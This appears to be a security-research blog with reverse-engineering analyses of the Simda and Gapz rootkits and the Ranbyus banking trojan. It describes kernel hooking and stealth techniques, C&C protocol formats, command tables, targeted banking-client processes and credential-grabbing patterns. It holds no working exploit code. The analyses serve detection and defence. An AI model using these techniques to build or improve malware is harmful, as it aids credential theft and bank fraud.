0x16/7ton

 photo doc155602017_152116624_zpsa322a969.gif

пятница, 19 июля 2013 г.

Win32/Simda family ring0 payload

 

[General View]


Articles,links about him
Main features:
  •  infect the drivers from nt!PsLoadedModuleList
  •  ability to hide rootkit files
  •  pseudo "modularity" architecture
  •  written in disgusting style :D

As already noted  EP_X0FF the code was not changed since March 2011

Here bin-diffing:


















Rootkit works only on x86 systems, but not so long ago he got a bootkit module for x64 Windows versions.

[Startup Cases] 

 

  •  DriverEntry start with empty RegistryPath:
     call payload function
  •  DriverEntry start with not empty RegistryPath ,but not from system32 directory:
     call infect and payload functions,not using direct inject usermode modules
  •  DriverEntry start with RegistryPath and include system32 directory [start like infected file]:
     create system thread (PsCreateSystemThread) and in that thread,call infect and payload functions.
Code in infected driver load original rootkit,which is stored on this path:
\\systemroot\\system32\\c_%4.4x%d.nls
[name generate via md5(ZwQueryVolumeInformationFile[VolumeCreationTime])]

 [Hooks]


At first Simda is trying to establish own debugging interface by overwriting KiDebugRoutine pointer to its callback function.
(he get this pointer with help of signature-based search in exported function KeEnterKernelDebugger)
Accordingly all the hooks of the rootkit ,implemented via software breakpoints int3(0xCC)
For intercepted functions he create structures,that it stores in an array of pointers.
struct array_hook_struct
{
   pvoid array_hook_struct_pointer;    

   int     size_array;
};
Where:
array_hook_struct_pointer  - ptr to array of hook_struct
size_array - size of that array

Main and most important hook structure,looks something like here:
struct hook_struct
{
   int init_boolean;
   int hook_type;
   int reserved_1;
   pvoid hook_function_origin_addr;
   pvoid hook_handler_addr;
   int reserved_2;
   pvoid detour_addr;
   pvoid nop_chain_addr;
};
So inside rootkit debugging interface,when a breakpoint exception has been occurred ,he dispatch them and redirect control flow to eip of detour function.
Here how this look with help of hex-rays:


What exactly Simda hooks?
The lower driver IRP_MJ_INTERNAL_DEVICE_CONTROL(IRP_MJ_SCSI) function,of hard disk DR0 device.
Hook-handler checked all SRB_FUNCTION_EXECUTE_SCSI request.
This hook provide :
  • to replace the contents of the infected driver to original clean code
  • to replace the contents of the original file rootkit(\\systemroot\\system32\\c_%4.4x%d.nls)by the contents of the biggest .nls file in the directory(\\systemroot\\system32\\)
Atapi and scsi driver hooks screenshots:
 
 














Hook of NtResumeThread, provide inject of Simda module into usermode processes
  







[Modularity]



As I mentioned early,Simda support modules architecture,which work in ring0 and in ring3.
r3 modules injected into the user-mode shell-process (explorer.exe)
r0 modules copied to the allocated memory.Then Simda created manually DRIVER_OBJECT struct and for the field DRIVER_OBJECT.DriverSection value is taken from the original
driver object \Driver\Disk (with ObReferenceObjectByName [* IoDriverObjectType]).
Some of the names of the modules within the sample
'ModuleR0Pdm'
'ModuleR0PdmCfg'
'ModuleR3Antimalware'
'bcs'

At ITW me was found only the implementation of the r0 module ModuleR0Pdm
and r3 bcs module















<ModuleR0Pdm>


The main task of this module, the creation of web-redirect config, hooks in NDIS and spoofing in network packets ip4 (UDP[DNS], TCP[http] protocols).
The path to the config file:
swprintf(path_conf, L"\\systemroot\\temp\\%d.tmp", md5(VolumeCreationTime)[0x2] ^ md5(VolumeCreationTime)[0x0] ^ 0x58589954); 
Config strings encrypted with trivial alg,that looks like here:
 for (i=0;i < length_str ; i++)
{
    str[i]^=key_xor[i%sizeof(int)];
    key_xor[i %sizeof(int)]^=str[i];
}
 
In kernelmode.info article about Win32/Simda you can also download my web-redirect config decrypt script.

Hooks module installed in all structures NDIS_OPEN_BLOCK (NDIS_MINIPORT_BLOCK->OpenQueue)from all miniport drivers except intermediate drivers and drivers with media type NdisMediumWan,NdisMediumCoWan.
That functions will be hooked:
NDIS_OPEN_BLOCK.ReceiveHandler
NDIS_OPEN_BLOCK.TransferDataHandler
NDIS_OPEN_BLOCK.TransferDataCompleteHandler
NDIS_OPEN_BLOCK.ReceivePacketHandler
NDIS_OPEN_BLOCK.ReceiveCompleteHandler
NDIS_OPEN_BLOCK.WanSendHandler
NDIS_OPEN_BLOCK.SendCompleteHandler
NDIS_OPEN_BLOCK.SendPacketsHandler
The system hooks module supports the NDIS versions 5.1;6.0;6.1;6.20

Installed hooks:


















Here how look the dns-spoofing in action,with google.com example:


























[Detection example]


For this test i used vba32-ark tool.You can see the detection of the acpi driver infection and two installed break-hooks:







[Conclusion]


Nothing special here,i am just believe that this old shit will never rise again.
See you in hell Win32/Simda
thx for reading.
P.S.
Found error?Hate me?
Please say it to me! ;)

------------------------------------------------------------
Manipulate the pulse, the pattern, the beat
Dominate the world

суббота, 2 марта 2013 г.

Win32/Gapz family ring0 payload


This is a general analysis of rootkit payload Gapz family,and him technics.
Other analyses:
Samples:

VirusTotal example:

[A little about dropper]


As has been discussed in other articles dropper uses different exploits for privileges elevate on the system.Because my main task will be to review ring0 payload,i am not stoped on the detailed analysis dropper. 
Show only schematically the way I chose to analyze the payload:















[Blocks-code conception]


So dropper successfully exploited the vulnerability,and shellcode load payload.
Payload looked like code,splited into structured blocks.Each unit has its own header, which precedes the main code in the block.

size_header == 0x20
Block_Header
0x0   delta_const
0x4   reserved1
0x8   reserved2
0xC  size_block
0x10 offset init_block_function
0x14 offset to config (only first block) 

0x18 reserved3[2]

Rootkit initial code parses the header of each blocks and called the initialization function.
In these functions, in general, Gapz allocated a pool that is filled with offset functions and specific to different data blocks.

In turn, all initialized address blocks (initialized pools) are stored in another pool Block_Box




























[Blocks description]



Most blocks has a strong purpose in function, and it is possible to give specific names.
The table summary of all blocks:
Block name
Block description
Block_Api
Contains the basic functions Ntoskrnl.exe, hal.dll used Gapz Also includes a code infector MBR / VBR, various help-functions, fields and buffers
Block_crypto
Contains all the cryptographic algorithms used in Gapz (like md4, md5, sha-1, rc4 etc.)
Block_hook_engine
Includes hook-algorithms,disasm lengths engine.
Block_FileSystem
Includes features for working FAT file system Gapz
Block_Atapi_Hooker
Contains handler of hook atapi driver
Block_parser
Includes function for parsing strings
Block_ndisImp
Includes function parser,wraps Ndis
Block_TcpIpStack
Gapz Tcp/Ip stack implementation
Block_Http
http protocol wraps
Block_Null_hooker
Contains handler hook in Null driver and function-interfaces(for usermode)
Block_ProcessManagment
Includes functions injects in usermode processes, process notify callback.
Block_Main
Locking block, contains the main polling cycle C&C,and the function uses a number of other functional blocks.


[Network Activity]


As seen from the table to the network part include three blocks Block_TcpIpStack, Block_ndisImp, Block_Http.
In order to control the transmission of data at the miniport driver rootkit uses this technique:
  • parses the image of ndis driver , namely .data section to find ndisMiniportList.(which stores structures NDIS_MINIPORT_BLOCK)
  • parses NDIS_MINIPORT_BLOCK and grabbing information from them  
Thus in Gapz implemented independent full protocol stack TCP/IP.
 
Brief simplified sheme:



























In the config file contains a list of domains rootkit C&C in the third level, and one second-level static.
Polling loop domains:















I am not found any interesting in Gapz protocol,all network activity of him used only for loading usermode payloads.

[Gapz File System]


Image of the file system is located at this path:
  \??\%C%:\System Volume Information\{00cb26da-f0cf-8c37-ece7-611d1b0cfb1a}
  Orange color it is random value

I found that the main code Block_FileSystem taken from open source project FullFat:

Gapz FullFatFS location picture:











 All data is stored in the filesystem is encrypted.In general, the main purpose of file system it is keep downloadable usermode modules.

[Hooks]


All hooks are set with a disassembler lengths engine.
First hook set on IdePortDispatchDeviceControl in atapi driver:
















The main purpose of this hook is very boring and standard: the substitution of buffer for read protected sectors,and deny write operation on them.Also protect yourself from IOCTL_ATA_PASS_THROUGH ,IOCTL_ATA_PASS_THROUGH_DIRECT

Hook in Null driver, is used as an interface to the usermode modules of rootkit.
In Block_Null_hooker contains a set of about 20 functions that are used to control Fullfat FS Gapz.
Hook handler looks like a typical DeviceIoControl handler, but the problem is that instead of the hook function null_IRP_MJ_DEVICE_CONTROL Gapz hook _NlsUnload (IRP_MJ_SHUTDOWN) wtf??













[09.04.2013] update
Ok ESET white paper explain this hook :)


[ProcessManagment]


In the Block_ProcessManagment contains main loop putting Process notify callback (PsSetCreateProcessNotifyRoutine), waiting for the Event,queries the FullFat file system for the presence new usermode modules received from C&C. 
If the module is found, it is inject him into the process by sending a standard APC.
In Process notify callback is not anything interesting, only manipulation
with double-linked lists, heh dont give a fuck for what they need ^_^.


[Conclusion]


Why so little written about such a large project? 
  • I dropped a lot of details
  • Lazy (tired) 
  • Gapz ugly (my hopes were not justified) 
  • Interest disappeared
  • C&C is dead and not respond
  • darkness around me
 :D

But seriously, I spent a lot of time to learn, get a lot of fun, experience, and made some notes for myself.
(hehe yes I think how to make fucking cool rootkit :D)

Overall not bad other researchers will also look at the Gapz.
I can missed something or be a wrong,maybe in some other version Gapz exist some changes..;)
Thanks for reading,sorry for bad english..(i am try learn him >_<)

-----------------------------------

Shine, shine your light on me.
Illuminate me, make me complete.

воскресенье, 3 февраля 2013 г.

Trojan.Win32/Spy.Ranbyus

[General View]


Before you start reading my notes about this malware,read another articles:
Ok,now let's look at the bot's pe image.It hasn't import,most strings are encrypted.
After some reversing I understood calling api format for that malware,look at this picture:









Every time when bot wants call the api,he gets pointer on api-table buffer(at the picture that pointer is in register eax) and chooses desirable function by index(at picture this is 0x13c)
To make analyze better I've made this api-table:
http://pastebin.com/g0MXyTnr
Also here are my ida-python script for decrypting strings:
http://pastebin.com/F5MSe6BD

[Malware Installing]

 

Installation in the system is very trivial.
First of all, malware tries drop itself in two possible ways:
  • in system directory (GetSystemDirectory)
  • in temp directory (GetTempPath)
Dropped filenames hardcoded in my sample:
  • ifkf_mfLEnWa_g.exe
  • BlvyLYGJKTTLK_gTzE.exe
All new files get original file time kernel32.dll.
Here are autorun registry keys, that bot uses:
  • Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
  • Software\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run (x64)
Name of registry key, which bot uses for autorunning:LmihNjzSczsUOFeQZJkVKCBFoz
Also in registry,malware stores main config:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Key name SysDebug32
Config encrypted by the same algorithm, which used for decrypting stringsBelow you can see the structure of the config:
config total size ==0x312 

BotConfig
Offset
Field name
0x0
char* host_url (C&C url)
0x64
char* botID (see below description)
0x96
bool block_bank_client_Work_1 (checked in java injection code)
0x97
bool block_bank_client_Work_2 (checked in java injection code)
0x98
bool block_bank_client_Work_3 (checked in java injection code)
0x99
bool block_bank_client_Work_4 (checked in cbmain.ex injection code)
0x9D
bool block_bank_client_Work_5 (checked in wclnt.exe,ip-client.exe,rclient.exe injection code)
0x9F
bool block_bank_client_Work_6 (checked in tiny.exe injection code)
0xAE
??
0xB2
??
0xBA
bool ProxyMode
0xBB
DWORD netAddr (proxy backconnect address)
0xBF
WORD port (proxy backconnect port)
0xC1
DWORD send_net_reques (if set to 1,bot send Net_Request)
0xC5
??
0xC9
DWORD rand
0xCD
DWORD rand
0xD1
struct FILETIME (Bot up time GetSystemTime->SystemTimeToFileTime)
0xD9
??
0xDB
??
0x1A1
??
0x30E
DWORD hash_config (used for checking integrity config)


[AVdetecting]

 

Bot enumerates processes and searches av vendors software:
Kaspersky
ESET
AVG
Avira
Avast
Norton Antivirus
McAfee
Panda Antivurus
Comodo
DrWeb


After this check he sends request to C&C, with request type AV_check (see below description).
Bot afraid of Kaspersky,so if he find his active process,he doesn't install in the system.
Also in him exists funny-useless code to killing ESET gui process (egui.exe).
In that code,he just trying open process with PROCESS_TERMINATE access,and terminate..So this is fucking disaster!


[InjectionCode]


Mechanism of injection in malware - it's just CreateRemoteThread.
Bot injects main payload code to another processes:
  • on x86 systems it is svchost.exe
  • on x64 systems it is explorer.exe (it creates process of explorer and injects)

Bot has hardcoded table, which consits of hash of the process name and code injection function.
In that sample which I have, some process names in table haven't injection code..Probably it's customizing during building bot.
Here I've gathered information about all processes, which I've found in the table below:

Table of process names used in malware for injection code
Company(Software)Name
Url
Image name
Injection Code
BSS DBO Bank-Client http://www.bssys.com/en/ cbmain.ex yes
Western Union http://www.westernunion.com translink.exe yes
SberBank Bank-Client http://www.sbrf.ru/en/ wclnt.exe yes
KazKom bank cilent http://en.kkb.kz/ rclient.exe yes
WebMoney Transfer http://www.wmtransfer.com/ webmoney.exe yes
Contact Money transfer system http://www.contact-sys.com/eng/index.phtml contactNG.exe yes
CBS scrooge http://eng.lime-systems.com/ tiny.exe yes
Unisteam Money Transfer http://intl.unistream.com UniStream.exe yes
Baltic Bank client http://www.baltbank.ru/bc/ BBClient.exe yes
Mozilla Firefox http://www.mozilla.org/en-US/ firefox.exe yes
Opera http://www.opera.com/ opera.exe yes
Safari Browser http://support.apple.com/kb/DL1531 safari.exe yes
Microsoft http://windows.microsoft.com iexplore.exe yes
Oracle http://www.oracle.com/index.html java.exe,javaw.exe yes
Putty SSH and telnet client http://www.putty.org putty.exe yes
IntrustBank client http://www.intrustbank.ru/ clntw32.exe no
Bank client http://www.rpb.ru/doc/doku.php?id=goststart intpro.exe no
Credit bank of Moscow http://english.mkb.ru/ bc_loader.exe no
B24 bank client http://www.bank24.ru/ iscc.exe no
Inbank bank client https://inbank.org/ inbank-start-ff.exe no
UralSib bank client http://www.bankuralsib.ru/index.wbp kb_cli.exe,kb_cli.ex no
Unknown bank client -/- bankcl.exe no
Unknown bank client -/- bk.exe no
Microsoft http://windows.microsoft.com ntvdm.exe no
Unknown bank client -/- startclient7.exe no
Chelyabinsk bank client http://www.chelinvest.ru/ el_cli.ex no
Unknown bank client -/- clbank.exe no
Unknown bank client -/- oncbcli.exe no
Unknown bank client -/- clmain.exe no
RegionBank client http://www.nomos-regiobank.ru/ elbank.exe no
BiKript bank client http://www.s3bank.ru/corp/client-bank/index.phtml/ ISClient.exe no
SGB bank client http://www.severgazbank.ru/ sgbclient.exe no
MFbank client http://www.mfbank.ru/index.php loadmain.exe no
Unknown -/- selva_copy.exe no
Unknown bank client -/- client7.exe no
Unknown bank client -/- bclient.exe no
Bank+ client http://cbs.inversion.ru/ cbsmain.exe no

Here are examples of payload for some processes:

Firefox,Iexplore,Opera,Safari payload
Delete all .ibank* file in systemroot/system32/java/ and %USERPOFILE% directory
Hook functions:
     wininet.dll
          HttpSendRequestW
          HttpSendRequestA
          HttpSendRequestExA
          InternetWriteFile
Firefox specific hook
      NSPR4.dll
           PR_write
In the handler of hooked function, it monitors access to online-banks by template.
Here are pattern strings, which it uses:
          https:\/\/ibank.prbb.ru
          https:\/\/ibank.alfabank.ru
          auth-attr-\d+-param1=.*&auth-attr-\d+-param2=.*
          \/servlets\/mbo
          \/servlets\/ibc
          /bsi.dll
          username=.*&password=.*

wclnt.exe,rclient.exe,ipclient.exe process payload
Hook function:
       kernel32.dll
             CreateFile
In the handler of the hooked function, it captures and sends on C&C key files(see below
Send_key_file_request):
        sign.key,master.key,UZ.DB3,GK.DB3


In general, injected payload looks similar,and most of them based on searching windows,taking screenshots,grabbing information from windows.Here are a table of searched windows(some of them written in Russian):

Searched windows table
Window Class
Window Caption
SunAwtDialog Вход в систему,Синхронизация с Банком
SunAwtFrame Вход в систему,Welcome
javax.swing.JFrame Вход в систему,Welcome
MSAWT_Comp_Class Вход в систему,Welcome
PuTTY -/-
TLoginWindow Логин
TGetOper Вход в систему
ThunderRT6FormDC Western Union Translink
TfAuthNew Tiny Client-Bank
WebMoney Keeper Classic Идентификация пользователя
UNIStreamR. Аутентификация. -/-

 

[NetworkActivity]

 

 

I identified three main parts of network for this bot:

-Sending information and geting tasks from C&C ,by http get-post requests.
-Binding port,for accepting incoming connections,to enable remote access to smart-card.
-Supporting reverse (backconnect) proxy SOCKS5

Bot uses traffic encryption by custom base64 algorithm with that alphabet:
"qBPTD5ZQcnLOjobYMd6JSEU1Ifv89G4RsXwe3yaKmFCAipurl0/t2VzxN+7khgHW="
So it is pretty easy to decrypt traffic with tool like this:
http://www.kahusecurity.com/2011/custom-base64-decoder/


Typical bot's request looks like:
------------------------------------------------------------------------------------
POST /releases/index.php HTTP/1.1
Content-Type: multipart/form-data, boundary=7DD02020A0D0000
User-Agent: gsa-crawler
Host: ___.__
Content-Length: 226
Connection: Keep-Alive
Cache-Control: no-cache

--7DD02020A0D0000
Content-Disposition: form-data; name="q"
vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==
--7DD02020A0D0000
Content-Disposition: form-data; name="data"; filename="new_file"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary


J3gS6SffbwB1fUno8z+y46+y4ZS=

--7DD02020A0D0000--

------------------------------------------------------------------------------------
Okay,lets parse this:
Blue color :    static value
Green color:   boundary,generated by GetSystemTime with format string
%02X%02X%02X%02X%02X%04X
Purple color : random useragent,see below all possible values from table.
Orange color: header of request message,so  here are example how it looks decrypted
id=0x16-779d52d376_33e2e8df_eb1735e7&session=2458654464&v=16779010&name=keno&mj=5&mi=1&pt=1&b=2600&dc=32
format string:
id=%s&session=%u&v=%u&name=%s&mj=%u&mi=%u&pt=%u&b=%u&dc=%u
id=BotId,generated by host name,and two magic dwords,calc by the main encryption algoritm (part of key table generation),but with using another alphabet:
      STORAGE_DEVICE_DESCRIPTOR serial number and product id in first round
      IP_ADAPTER_INFO.address in second round
session=random value
v= bot version number (constant value) 
name=bot build name (constant string) 
mj=MajorVersion Windows
mi=MinorVersion Windows
pt=ProductType Windows
b=BuildNumber Windows
dc=processor arch model (x86/x64)

Aqua color: request type,see below type table
Red color:   this is data of request

User agent table
Firefly/1.0 (compatible; Mozilla 4.0; MSIE 5.5)
FlashGet
Flexum/2.0
FreshDownload/x.xx
FavIconizer
DeepIndex
gsa-crawler
ContentSmartz
Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) TrueRobot; 1.5
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)
Mozilla/5.0 (compatible; TridentSpider/3.1)
NationalDirectoryAddURL/1.0
NETCOMplete/x.xx
Nocilla/1.0
OliverPerry
OpenTextSiteCrawler/2.9.2
Opera/8.xx (Windows NT 5.1; U; en)
Opera/9.00 (Windows NT 5.1; U; de)
PHP/4.0.6
PHP/4.1.2
Popdexter/1.0
PureSight
RAYSPIDER/Nutch-0.9
Scooter-3.2.EX
SearchdayBot
ShablastBot 1.0
SiteXpert
TeamSoft WinInet Component
Toutatis x.x-x
URLBase/6.x
WebCorp/1.0
Y!J-SRD/1.0
Yeti
Zend_Http_Client 


Request Type table
Request type name
Request Parameters
Additional Description
AV_check
&av=%d
Send request about working av soft
Check_token
&token=0 (token not exist)
&token=1 (token exist)

Send_key_file_request
&cb=1
Send bank client key file
Excep_request
&exception
Send when in bot occurred unhandled exception.
Alr_load_request
&lr=1
Send when failed create mutex,detecting already running bot.
SendFile_Request
&file=1 (File not found)
&file=2 (send file in cab file)

Comm_compl_request
&cmd=1
Send when command get from C&C completed.
Load_execute_request
&load=1 (Success)
&load=2 (failed)

Net_Request
&net=1
Send bot network information
Key_request
&keys=1
Send when found .jks key
Screen_request
&screen=1
Send when make screenshot,(in cab file screenshot)
Notify_request
&t=%d (random)
Send when injected in process (in data of request NOTIFY:%processname%)


Bot asks C&C for the tasks in the loop by sending requests.
Here are how typical task request from C&C and answer look like:





















Below is the structure of a response from the C&C
Task Message:
   DWORD count_param
   DWORD command
   BYTE     data []


Command table
Command
Description
0x2
Bot SelfUpdate
0x3
Enable blocking bank client (set to true state block_bank_client_Work_1,block_bank_client_Work_2 in config)
0x4
Disable blocking bank client (set to false state block_bank_client_Work_1,block_bank_client_Work_2 in config)
0x5
Enable blocking bank client (set to true state block_bank_client_Work_3 in config)
0x6
Disable blocking bank client (set to true state block_bank_client_Work_3 in config)
0x7
Enable Proxy Mode (set ProxyMode to true state,set netAddr and port in config)
0x8
Disable Proxy Mode (set ProxyMode to false state in config)
0x9
Get list of file from all volume (if data[] ==NULL),or search file (mask filename in data[]),SendFile_Request
0x0A
Download file from url (get in data[]) by get request,and execute them.Send Load_execute request.
0x0C
Search key file(search mask *.jks ),send Key_request.
0x0D
Kill OS(delete file *.*,make BSOD like in 0x11 command)
0x0E
Bot Self deleting
0x0F
Send bot network information (Net_Request)
0x10
Reboot System
0x11     
BSOD system (inject in csrss thread,in injected thread make exception)
0x12
Set to 1 value in offset 0xC5 (unknown)
0x13
Set to 0 value in offset 0xC5 (unknown)
0x14
Update C&C url address in config (field host_url)
0x15
Enable blocking bank client (set to true state block_bank_client_Work_4 in config)
0x16
Disable blocking bank client (set to false state block_bank_client_Work_4 in config)
0x19
Enable blocking bank client (set to true state block_bank_client_work_5 in config)
0x1B
Load and laucnh module.
0x1C
Make Screenshot,send Screen_request
0x20
Disable blocking bank client (set to false state block_bank_client_work_5 in config)


If in task cycle C&C not responds bot can update config to use second url C&C.

As I said,bot binds port(0x165a) for supporting remote control of smart-card.
In simplified manner, commands give ability to use these api:

0x0     SCardStatusA
0x1     SCardGetStatusChangeA
0x2     SCardDisconnect
0x3     SCardControl
0x4     SCardEstablishContext
0x5     SCardListReadersA
0x6     SCardConnectA
0x7     SCardBeginTransaction
0x8     SCardEndTransaction
0x9     SCardTransmit
0xa     SCardGetAttrib


Some additional information about C&C struct directory(not all of course):

/releases 
      avs.php
      base64.php
      commands.php
      config.php
      stat.php
      getrc.php

      /inc
          jabber.php
          thumbnail.php

      /modules
      /default
            /32
            /64     
      /other
      /_screenshots
              /1004 (example)
      /_files



[Conclusion]



I still haven't described a lot in this bot,reverse proxy protocol,java patching and etc. Maybe I forgot something,or another shit.
But finally,my target was just show you a paradox:
bots with simple architecture still working effectively and still steal money.

Thanks for reading ^_^
---------------------------
Cause and effect.